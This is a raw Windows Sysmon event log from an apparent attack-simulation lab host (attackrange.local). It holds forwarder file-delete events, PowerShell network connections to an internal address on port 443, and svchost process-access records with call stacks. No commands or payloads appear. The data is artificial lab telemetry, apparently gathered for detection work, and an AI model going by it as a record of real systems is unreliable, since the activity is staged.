Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F6196A1067E8A378DD5BE2095417DA,SHA256=E6BAE8931156E67A2A6EB57EF6AF23AEEDCECCB9722F0796A2B8D1F18BB10397,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:43.818{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B455C16A5256680727708682A1B5F863,SHA256=755D5CEA68235D57F664F2E85A2CAC7929AF651FFEDE01F7032F9A5E74EAC419,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:44.922{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=BFE30CAA869078205272433B457FA332,SHA256=C934B343A0376D967485F2982D8C8E2CDB550B93E4BE53A8B5AEFA9401DD971F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:44.821{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AA7A1F15FF81FA97896F14F13236AF7,SHA256=B6BA57516A7ABFEB10C5C83E666276D235980F9348B196A3C19251B3BE602CF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:45.851{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E740B865195412333AD8C92EE6005B33,SHA256=B88E808AACC07634AF5EFE8022E23D581046A0B79C794841CB6D1F1DC50B2C03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:45.604{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=72D57BEF60D3B1CD78D05E7D63EFEF1E,SHA256=F4FA985259DF5DEB2E316D31DB861FC550CA68733344474C3BD3B18A8985CB28,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:10.175{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52622-false10.0.1.12-8000- 23542300x800000000000000035343986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:46.887{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=966735AE99EA73EA2FC28CD9849304C8,SHA256=307FB2EB183AEC185C6E471430D11127CFD6A40B813F562A4FF9A3FC66B936C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:11.597{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52623-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:47.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53FD3AEF38A5A45C3A749444EE49B45F,SHA256=0588253F74909F4D00F4A9BA96EB935A965A046279F83F60ABA02ADCD9E12040,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:48.948{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6F29F1917847ABDEF941C7DCB2A8180,SHA256=4E2BCFDCC49D2CD53B93EA8C9E3B512D83748D18413B80DA45F0CE03AD37EF54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:49.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EDC2518D4B5D5520AE2A2B89F2A0C3B,SHA256=21FEB4BB7B9D770C2344D5C0E315D81EC418CEABB5FF34BA431B4BDE35107BB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:49.616{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=125EFBA2ACED2625CF84743B63FC60FD,SHA256=3CB5EE8257C42D6AEE3AB689301600856629CC6E8DC78186D3FDC0A133A0BAB2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:15.193{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52624-false10.0.1.12-8000- 23542300x800000000000000035343993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:50.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D9B1813F13373B44631417EE3FCEE19,SHA256=B1444C112999FEC458FC0E0A818CE2A70B180AD5C040DC2B58C2E5A973012E3D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:15.609{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52625-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:51.998{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6527D9C39177E066B4AC3B90E4CF7B54,SHA256=99C8B23A9606B1547ECCD78828EAC75B71B6A1D9687332A8E881A03753B6AD09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:53.012{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0A29E4BB67CC2C3255621BB93AEECF2,SHA256=2A234A903AE443E28A77D70BD01CF99D7D5E1C1D0124C255B1BB7B8EAD3A3372,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:20.204{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52626-false10.0.1.12-8000- 23542300x800000000000000035343996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:54.060{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04DB482C12D50699AA434C300AFAABB0,SHA256=CE382ED3E2DFBEDBB659F3433BC008CF30E3FEE78DD7CE7C5418E64A7D0644BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:08:21.619{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52627-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:55.641{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=10674E9FF8867BB077B8E9151D9366BE,SHA256=74BE145E76173F107C4D6B2860845EC83A423928D2D2DBC1A921D190229334AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:55.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E19809AA11180004E51386FDD8AF466,SHA256=1420602B02D8BCF5AF675B27E9C508D1A2808A6FD90D6C2D887B6D5C14DA98FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:56.125{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5926DF5AF8013997C73126CDBF135EDE,SHA256=22B0401EE1AB7842E43A97197B6B5D3F9BC74206A749DC87B4518F061B09BB9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:57.177{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 